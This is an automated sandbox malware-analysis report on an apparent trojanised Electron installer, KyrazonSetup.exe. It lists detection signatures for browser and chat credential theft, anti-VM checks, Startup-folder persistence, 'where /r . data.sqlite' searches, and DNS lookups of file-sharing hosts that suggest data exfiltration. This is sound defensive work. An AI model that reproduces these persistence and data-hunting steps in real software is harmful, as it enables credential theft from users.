Windows Analysis Report
KyrazonSetup.exe

Overview

General Information

Sample name:KyrazonSetup.exe
Analysis ID:1489101
MD5:7a84bbeade50e7110fe8d278dc22b92d
SHA1:9624dde2043059402cc1f729684ecc2f9a424eef
SHA256:c765f61cee33c326acc4ea19256267c35129a1ec7edb567fe0b5ed9a88e3d6b1
Tags:exeGuLoader
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Drops large PE files
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • KyrazonSetup.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\KyrazonSetup.exe" MD5: 7A84BBEADE50E7110FE8D278DC22B92D)
    • cmd.exe (PID: 6616 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5768 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • find.exe (PID: 6168 cmdline: "C:\Windows\system32\find.exe" "KyrazonGodot.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
  • KyrazonGodot.exe (PID: 4504 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • KyrazonGodot.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • Shortcut.exe (PID: 5644 cmdline: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe MD5: 59375510BDE2FF0DBA7A8197AD9F12BB)
      • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3636 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7140 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 2484 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2664 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2912 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5768 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7004 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • where.exe (PID: 4296 cmdline: where /r . data.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
    • KyrazonGodot.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7412 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7500 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7576 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7652 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7792 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7868 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7948 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • Conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 1640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3636 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1184 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5644 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7604 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7964 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1168 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8188 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • Conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2148 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • KyrazonGodot.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • KyrazonGodot.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8176 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • KyrazonGodot.exe (PID: 4296 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7480 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • Conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7576 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • where.exe (PID: 7580 cmdline: where /r . data.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
    • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7876 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7948 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8164 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • Conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, ParentProcessId: 4504, ParentProcessName: KyrazonGodot.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", ProcessId: 6592, ProcessName: cmd.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe, ProcessId: 5644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
No Suricata rule has matched

Source: KyrazonSetup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KyrazonSetup.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b3cf5a4f-183c-5906-ad23-5f1f95ad8d0e
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\LICENSE.electron.txt
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt
Source: KyrazonSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D3DCompiler_47.pdb source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libEGL.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1861082432.000000000078C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1864822801.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1803630374.0000000005600000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803339063.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803837379.000000000564F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales
Source: global trafficTCP traffic: 192.168.2.4:49528 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 45.55.107.24 45.55.107.24
Source: Joe Sandbox ViewIP Address: 162.159.135.232 162.159.135.232
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: oshi.at
Source: global trafficDNS traffic detected: DNS query: tempfile.me
Source: global trafficDNS traffic detected: DNS query: api.gofile.io
